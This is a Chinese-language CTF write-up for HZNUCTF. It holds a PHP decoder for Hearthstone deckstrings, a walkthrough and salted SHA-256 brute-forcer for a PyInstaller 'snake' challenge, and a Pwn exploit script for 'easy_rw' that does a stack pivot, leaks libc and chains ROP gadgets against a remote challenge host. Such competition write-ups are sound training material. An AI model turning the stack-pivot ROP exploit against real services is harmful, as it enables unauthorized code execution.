Misc

致我那逝去的青春

炉石传说的代码解析,参考 https://zhangshuqiao.org/2018-12/炉石卡组代码解析/

直接贴php代码好了

<?php
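// The deckstring is base64 over a stream of varints. The challenge string is
// hard-coded here; real deckstrings come from untrusted users, so decode in
// strict mode (the second argument) — the default mode silently drops
// characters outside the base64 alphabet and would happily "decode" garbage.
$deckstring = "AAECAZoFKNAFhAeMBtIGngXIBrwFzgnmBpIJpgnSBrYH5gaSCaYJ0ga2B4IGugm2B9AF/gOIBPQIiAnQBb4GiAngA8wI8ge2B+oDvga2B6gFmgjyB+IJAAA=";
$binary = base64_decode($deckstring, true);
if ($binary === false) {
    printf("Invalid deckstring");
    die;
}
// Expand to one integer per byte (0..255): hex text -> 2-char chunks -> ints.
// $arr is what the varint reader below consumes from the front.
$hex = bin2hex($binary);
$arr = str_split($hex, 2);
$arr = array_map("hexdec", $arr);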

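/**
 * Decode one little-endian base-128 varint from the front of $data.
 *
 * Each byte contributes its low 7 bits; the high bit (0x80) means another
 * byte follows. Consumed bytes are removed from $data in place.
 *
 * The original loop relied on array_shift() returning null once the array was
 * empty, which made a truncated varint decode silently as a partial value and
 * let an over-long varint shift past 64 bits. Both are now rejected, because
 * deckstrings are attacker-controlled input.
 *
 * @param int[] $data byte values (0..255), consumed from index 0
 * @return int the decoded value
 * @throws InvalidArgumentException on a truncated or over-long varint
 */
function read_varint(&$data) {
    $shift = 0;
    $result = 0;
    do {
        if (count($data) === 0) {
            throw new InvalidArgumentException("Truncated varint");
        }
        // 10 bytes (shift 0..63) already cover a full 64-bit value.
        if ($shift > 63) {
            throw new InvalidArgumentException("Varint too long");
        }
        $c = array_shift($data);
        $result |= ($c & 0x7f) << $shift;
        $shift += 7;
    } while ($c & 0x80);
    return $result;
}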

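/**
 * Guard a list length read from the deckstring.
 *
 * Every list entry occupies at least one byte, so a count larger than the
 * bytes still unread can never be satisfied. Without this check a forged
 * deckstring with a huge count keeps the caller's loop spinning long after the
 * input is exhausted. Errors print and exit, matching parse_deck's own style.
 *
 * @param int   $n    count decoded from the input
 * @param int[] $data bytes not yet consumed
 * @return int  $n unchanged when it is plausible
 */
function _deck_list_count($n, array $data) {
    if ($n < 0 || $n > count($data)) {
        printf("Invalid deckstring");
        die;
    }
    return $n;
}

/**
 * Parse a decoded deckstring byte array into [cards, heroes, format].
 *
 * Wire layout (all fields varints): reserved byte (must be 0), version (must
 * be 1), format, hero count followed by hero ids, then three card lists:
 * ids that appear once, ids that appear twice, and (id, count) pairs.
 *
 * @param int[] $data byte values; passed by value, so the caller's array is
 *        left intact while read_varint consumes the local copy
 * @return array [ [[card_id, count], ...], [hero_id, ...], format ]
 */
function parse_deck($data) {
    $reserve = read_varint($data);
    if ($reserve != 0) {
        printf("Invalid deckstring");
        die;
    }
    $version = read_varint($data);
    if ($version != 1) {
        printf("Unsupported deckstring version %s", $version);
        die;
    }
    $format = read_varint($data);

    $heroes = [];
    $num_heroes = _deck_list_count(read_varint($data), $data);
    for ($i = 0; $i < $num_heroes; $i++) {
        $heroes[] = read_varint($data);
    }

    $cards = [];
    // Singletons: one id each.
    $num_cards_x1 = _deck_list_count(read_varint($data), $data);
    for ($i = 0; $i < $num_cards_x1; $i++) {
        $card_id = read_varint($data);
        $cards[] = [$card_id, 1];
    }
    // Doubles: one id each, implied count 2.
    $num_cards_x2 = _deck_list_count(read_varint($data), $data);
    for ($i = 0; $i < $num_cards_x2; $i++) {
        $card_id = read_varint($data);
        $cards[] = [$card_id, 2];
    }
    // Explicit (id, count) pairs for anything else.
    $num_cards_xn = _deck_list_count(read_varint($data), $data);
    for ($i = 0; $i < $num_cards_xn; $i++) {
        $card_id = read_varint($data);
        $count = read_varint($data);
        $cards[] = [$card_id, $count];
    }
    return [$cards, $heroes, $format];
}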

// Parse the byte array built above and dump [cards, heroes, format];
// each cards entry is [card_id, count].
$a = parse_deck($arr);
print_r($a);
?>

image-20230712140539812

然后将解析出的卡牌 ID 数组中的每个值除以十，再转成 ASCII 字符，拼起来即可得到 flag

image-20230712140612381

flag:HZNUCTF{WuwU_WuwU_My_H34rtHSt0ne_1S_Die}

还有python的一个库可以直接出

image-20230712140647756

Snake

很经典,直接上pyinstxtractor

image-20230712140704409

然后进去根据struct把snake.pyc的头补上

但是发现struct的头被去掉了

image-20230712140711837

没关系,因为解压出来的还有base_library的文件,里面随便找个头补上就好了

image-20230712140721307

image-20230712140727548

image-20230712140736760

然后在线反编译或者uncompyle6都行,我选择在线

image-20230712140749993

发现flag_is_me的关键字样,复制出来看看

image-20230712140759290

发现就是带三个盐值的 sha256，代码中间的注释 `#5位 ascii+digits+_` 也提示了花括号里是五位的大小写字母、数字和下划线，直接爆破即可

image-20230712140811014

去源文件找盐值

第一个第二个很明显

image-20230712140818076

第三个就是每位减个下标就好

image-20230712140824748

然后就是这样子

image-20230712140835586

最后去爆破就好了

image-20230712140849031

import hashlib
import itertools
import string
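# Salts recovered from the decompiled snake.pyc (the third one is the
# per-index-adjusted string); the hash is sha256(salt_1 + salt_2 + salt_3 + flag).
salt_1 = 'mxx307shuai'
salt_2 = 'mxx407shuai'
salt_3 = 'mggdashuaibi'
salt = salt_1 + salt_2 + salt_3
# Candidate alphabet, same members and order as the original hand-written list:
# A-Z, a-z, 0-9, '_'.
dic = list(string.ascii_uppercase + string.ascii_lowercase + string.digits + "_")
# Target digest taken from the decompiled check.
TARGET = 'c08521f3c380906d05ee8afbc7fa2943afb3788d9cec94c1b86771ee35ca4738'


def find_flag(target, salt, length=5, alphabet=None, prefix='HZNUCTF{', suffix='}'):
    """Brute-force the flag body and return the first full match, or None.

    Tries every ``length``-character string over ``alphabet`` (default: ``dic``),
    wraps it as ``prefix + body + suffix`` and compares
    ``sha256(salt + candidate)`` against ``target``. Unlike the original nested
    loops this stops at the first hit and works on bytes throughout, so each
    candidate costs one hash and no per-iteration ``str.encode``.

    Args:
        target: expected sha256 digest as a hex string.
        salt: string prepended to the candidate before hashing.
        length: number of alphabet characters between prefix and suffix.
        alphabet: iterable of single-character strings; defaults to ``dic``.
        prefix, suffix: fixed flag wrapper around the brute-forced body.

    Returns:
        The matching flag string, or ``None`` if nothing in the search space
        hashes to ``target``.

    Raises:
        ValueError: if ``target`` is not valid hex.
    """
    if alphabet is None:
        alphabet = dic
    if length < 0:
        return None
    # Compare raw digests rather than hex strings; fromhex also validates target.
    want = bytes.fromhex(target)
    salt_b = salt.encode('utf-8')
    prefix_b = prefix.encode('utf-8')
    suffix_b = suffix.encode('utf-8')
    symbols = [c.encode('utf-8') for c in alphabet]
    for combo in itertools.product(symbols, repeat=length):
        candidate = prefix_b + b''.join(combo) + suffix_b
        if hashlib.sha256(salt_b + candidate).digest() == want:
            return candidate.decode('utf-8')
    return None


if __name__ == '__main__':
    # 5 chars from ascii letters + digits + '_' (hint from the decompiled source).
    flag = find_flag(TARGET, salt)
    if flag is not None:
        print(flag)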

得到flag:HZNUCTF{1s_R4}

Pwn

easy_rw

Pwn佬说很简单,没什么好说的,就是迁移加个rw,直接贴脚本

from pwncy import *
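# Exploit script for easy_rw. Flow as written: overflow into a stack pivot onto
# a writable region of the binary, leak puts@libc with a ROP chain on the fake
# stack, then pivot again into a chain that uses libc gadgets. Every constant
# below is specific to the challenge binary and the shipped libc.so.6, and all
# helpers (load, debug, ru, sl, flat, recv_libc, local_search, itr, asm) come
# from the author's pwncy wrapper, so nothing here is reusable as-is.
context(arch = "amd64",log_level ="debug",endian = "little")

# Remote endpoint is the CTF instance; the libc path is the one given with the task.
p,elf,libc = load("easy_rw",remote_libc = "./libc.so.6",ip_port = "43.142.252.111:10001")
debug(p,'no-tmux',0x00000000004012E0)  # presumably a breakpoint for local runs — verify
read = 0x0000000000401338          # author's label; presumably re-enters the read() call in the binary
migration = 0x404000               # writable page in the binary used as the fake stack
puts_plt = elf.plt['puts']
puts_got = elf.got["puts"]
leave_ret = 0x000000000040126f     # leave; ret — performs the pivot to rbp
read_plt = elf.plt["read"]
pop_rbp = 0x00000000004011dd
pop_rdi = 0x00000000004013c3
pop_rsi_15 = 0x00000000004013c1    # unused below, kept from the original

ru(">> ")
# First overflow: offset 0x40 looks like the saved rbp (new frame at
# migration+0x500) and 0x48 the return address; the 0x40 frame size is
# inferred from the offsets, not from anything visible here.
payload = flat(
{
0x40: migration + 0x500,
0x48: read,
},filler = b"\x00",length = 0x50)
sl(payload)
pause()
# Chain written onto the pivoted stack: puts(puts@got) to leak libc, then
# read() again to stage the next chain, then leave;ret with rbp = ret.
ret = 0x4044c0 - 0x8
payload2 = flat({
0x0: [pop_rdi,puts_got],
0x10: [puts_plt,pop_rbp],
0x20: migration + 0x800,
0x28: read,
0x40: [ret,leave_ret],
},filler = b"\x00")
sl(payload2)
log_info("puts_addr")
puts_addr = recv_libc()
pause()
system,binsh,libc_base = local_search("puts",puts_addr,libc)
# The binary has no usable pop rsi gadget in the chain above, so take one from libc.
pop_rsi = libc_base + next(libc.search(asm("pop rsi; ret")))
# Final chain: read() into migration+0xf00, puts() it back, then pivot once
# more. (A dead `ret = 0x4044800 - 0x40` assignment — an extra digit in the
# address and never used — was dropped from the original.)
payload3 = flat({
0x0: [pop_rsi,migration + 0xf00],
0x10: [read_plt,pop_rdi],
0x20: migration + 0xf00,
0x28:puts_plt,
0x40: migration + 0x800 - 0x40 - 0x8,
0x48: [pop_rdi,3,leave_ret],
},filler = b"\x00")
sl(payload3)
itr()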

image-20230712141014332

得到flag:flag{e1sy_r0p_byp1ss_0rw!}